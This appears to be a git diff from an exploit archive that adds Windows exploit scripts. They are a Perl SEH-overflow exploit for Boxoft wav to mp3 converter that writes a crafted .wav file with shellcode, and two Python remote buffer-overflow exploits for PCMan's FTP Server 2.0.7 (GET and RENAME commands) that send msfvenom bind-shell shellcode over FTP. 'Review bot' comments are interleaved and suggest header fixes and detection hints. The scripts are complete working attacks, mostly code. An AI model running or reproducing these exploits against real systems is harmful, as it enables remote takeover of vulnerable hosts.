x31\x31\x31\x31\x3
1\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x3
1\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30". +"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"; + +for($i=1;$i<=4212;$i++){ +$buffer="$buffer\\x30"; # 4212 X "0" +} +$buffer=$buffer."\x31\x31\x31\x31\x31\x31\x31\x31\x0a\x7d\x7d\x7d"; # EOF = }}} + +print FILE $buffer; +close FILE; 
diff --git a/platforms/windows/local/38035.pl b/platforms/windows/local/38035.pl
new file mode 100755
index 000000000..1d325f9de
--- /dev/null
+++ b/platforms/windows/local/38035.pl
@@ -0,0 +1,41 @@
+#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64
+# Date: 8-31-2015
+# Software Link: http://www.boxoft.com/wav-to-mp3/
+# Exploit Author: Robbie Corley
+# Contact: c0d3rc0rl3y@gmail.com
+# Website:
+# Target: Windows 7 Enterprise x64
+# CVE:
+# Category: Local Exploit
+#
+# Description:
+# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file
+
+my $buff = "\x41" x 4132;
+#my $nseh = "\x42" x 4;
+#my $seh = "\x43" x 4;
+my $endofbuff = "\x41" x 5860;
+
+
+$nseh = "\xeb\x06\x90\x90"; # jump to shellcode
+$seh = pack('V',0x0040144c); # pop pop retn
+
+#MessageBox Shellc0de
+#https://www.exploit-db.com/exploits/28996/
+
+my $shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+#$nops = "\x90" x 20;
+
+open(myfile,'>crash3r.wav');
+
+print myfile $buff.$nseh.$seh.$shellcode.$endofbuff;
+close (myfile);
\ No newline at end of file
diff --git a/platforms/windows/remote/38003.py b/platforms/windows/remote/38003.py
new file mode 100755
index 000000000..1f5bd489f
--- /dev/null
+++ b/platforms/windows/remote/38003.py
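Review bot: In 38035.pl the header never says which version of the converter is affected, and `# Website:` and `# CVE:` are left empty, so a reader cannot tell which installs are exposed. I would add `# Version: <affected version>` and mark the two empty fields `N/A`, as 38003.py does for its CVE line. On style, `$nseh` and `$seh` are assigned without `my` directly below their commented-out `my` declarations, and the result of `open(myfile,'>crash3r.wav')` is never checked. Removing the three commented-out lines and using `open(my $fh, '>', 'crash3r.wav') or die "open: $!";` (with `print $fh` / `close $fh` to match) would read cleaner.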
@@ -0,0 +1,62 @@
+#!/usr/bin/python
+
+# Exploit Title: PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)
+# Date: 28 Aug 2015
+# Exploit Author: Koby
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3
+# CVE : N/A
+
+import socket
+import sys
+
+# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
+# Payload size: 352 bytes
+shellcode = (
+"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
+"\x0e\x69\x8c\x9b\xa3\x83\xee\xfc\xe2\xf4\x95\x64\x19\xa3"
+"\x69\x8c\xfb\x2a\x8c\xbd\x5b\xc7\xe2\xdc\xab\x28\x3b\x80"
+"\x10\xf1\x7d\x07\xe9\x8b\x66\x3b\xd1\x85\x58\x73\x37\x9f"
+"\x08\xf0\x99\x8f\x49\x4d\x54\xae\x68\x4b\x79\x51\x3b\xdb"
+"\x10\xf1\x79\x07\xd1\x9f\xe2\xc0\x8a\xdb\x8a\xc4\x9a\x72"
+"\x38\x07\xc2\x83\x68\x5f\x10\xea\x71\x6f\xa1\xea\xe2\xb8"
+"\x10\xa2\xbf\xbd\x64\x0f\xa8\x43\x96\xa2\xae\xb4\x7b\xd6"
+"\x9f\x8f\xe6\x5b\x52\xf1\xbf\xd6\x8d\xd4\x10\xfb\x4d\x8d"
+"\x48\xc5\xe2\x80\xd0\x28\x31\x90\x9a\x70\xe2\x88\x10\xa2"
+"\xb9\x05\xdf\x87\x4d\xd7\xc0\xc2\x30\xd6\xca\x5c\x89\xd3"
+"\xc4\xf9\xe2\x9e\x70\x2e\x34\xe4\xa8\x91\x69\x8c\xf3\xd4"
+"\x1a\xbe\xc4\xf7\x01\xc0\xec\x85\x6e\x73\x4e\x1b\xf9\x8d"
+"\x9b\xa3\x40\x48\xcf\xf3\x01\xa5\x1b\xc8\x69\x73\x4e\xc9"
+"\x61\xd5\xcb\x41\x94\xcc\xcb\xe3\x39\xe4\x71\xac\xb6\x6c"
+"\x64\x76\xfe\xe4\x99\xa3\x78\xd0\x12\x45\x03\x9c\xcd\xf4"
+"\x01\x4e\x40\x94\x0e\x73\x4e\xf4\x01\x3b\x72\x9b\x96\x73"
+"\x4e\xf4\x01\xf8\x77\x98\x88\x73\x4e\xf4\xfe\xe4\xee\xcd"
+"\x24\xed\x64\x76\x01\xef\xf6\xc7\x69\x05\x78\xf4\x3e\xdb"
+"\xaa\x55\x03\x9e\xc2\xf5\x8b\x71\xfd\x64\x2d\xa8\xa7\xa2"
+"\x68\x01\xdf\x87\x79\x4a\x9b\xe7\x3d\xdc\xcd\xf5\x3f\xca"
+"\xcd\xed\x3f\xda\xc8\xf5\x01\xf5\x57\x9c\xef\x73\x4e\x2a"
+"\x89\xc2\xcd\xe5\x96\xbc\xf3\xab\xee\x91\xfb\x5c\xbc\x37"
+"\x6b\x16\xcb\xda\xf3\x05\xfc\x31\x06\x5c\xbc\xb0\x9d\xdf"
+"\x63\x0c\x60\x43\x1c\x89\x20\xe4\x7a\xfe\xf4\xc9\x69\xdf"
+"\x64\x76")
+
+
+# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
+# bad data is a string of 2007 "A" characters to get to an EIP overwrite
+# followed by the JMP ESP instruction 0x7c9d30eb in SHELL32.dll
+baddata = '\x41'*2007+'\xeb\x30\x9d\x7c'
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+# change target IP/port as needed
+# run this script then to connect use nc for your windows shell
+# nc [target IP address] 4444
+connect=s.connect(('192.168.1.135',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n')
+s.close()
diff --git a/platforms/windows/remote/38013.py b/platforms/windows/remote/38013.py
new file mode 100755
index 000000000..fc17712f6
--- /dev/null
+++ b/platforms/windows/remote/38013.py
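Review bot: In 38003.py the header comments record how the overflow was found but nothing a defender can act on, and 38013.py below has the same gap. The script itself shows an anonymous login followed by a single `GET` line whose argument runs past 2000 bytes, and the payload comment names a bind listener on TCP 4444. I would put that in the header, e.g. `# Detection: FTP command line longer than ~2 KB after anonymous login; unexpected listener on TCP 4444 on the server`. The entry also does not say whether a fixed release exists, so `# Fixed in: <version, if any>` should be filled in or marked unknown. As a style point, `import sys` is unused and the value assigned to `connect` is never read.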
@@ -0,0 +1,57 @@
+#!/usr/bin/python
+# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
+# Date: 29 Aug 2015
+# Exploit Author: Koby
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3
+
+import socket
+import sys
+
+# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
+# Payload size: 352 bytes
+shellcode = (
+"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
+"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
+"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
+"\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b"
+"\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4"
+"\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6"
+"\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7"
+"\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62"
+"\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92"
+"\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16"
+"\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc"
+"\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60"
+"\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92"
+"\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d"
+"\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73"
+"\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40"
+"\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c"
+"\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79"
+"\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4"
+"\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16"
+"\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5"
+"\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e"
+"\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28"
+"\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b"
+"\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0"
+"\x2d\xc2")
+
+# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
+# bad data is a string of 2004 "A" characters to get to a EIP overwrite
+# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll
+baddata = '\x41'*2004+'\xed\x8e\xb4\x7c'
+
+# login to ftp followed by sending the bad data & payload
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.135',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n')
+s.close()
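Review bot: In 38013.py the comment above `baddata` places the return address "in SYSTEM32.dll", but as far as I know SYSTEM32 is a directory name, not a module. 38003.py names SHELL32.dll for its address, so this is presumably the same library, and the comment should be corrected once that is confirmed. Separately, the filler is 2004 bytes after `RENAME ` where 38003.py uses 2007 after `GET `, which is the same total line length. That suggests, though nothing on this page proves it, one shared command buffer rather than two separate bugs. If so the header should say it, because a filter or alert keyed on the command verb would miss the other entry, while a length limit on the FTP command line covers both.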